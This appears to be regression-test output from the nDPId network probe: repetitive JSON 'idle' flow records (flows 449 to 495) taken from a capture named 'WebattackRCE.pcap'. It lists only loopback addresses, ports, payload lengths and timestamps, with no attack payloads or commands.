+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 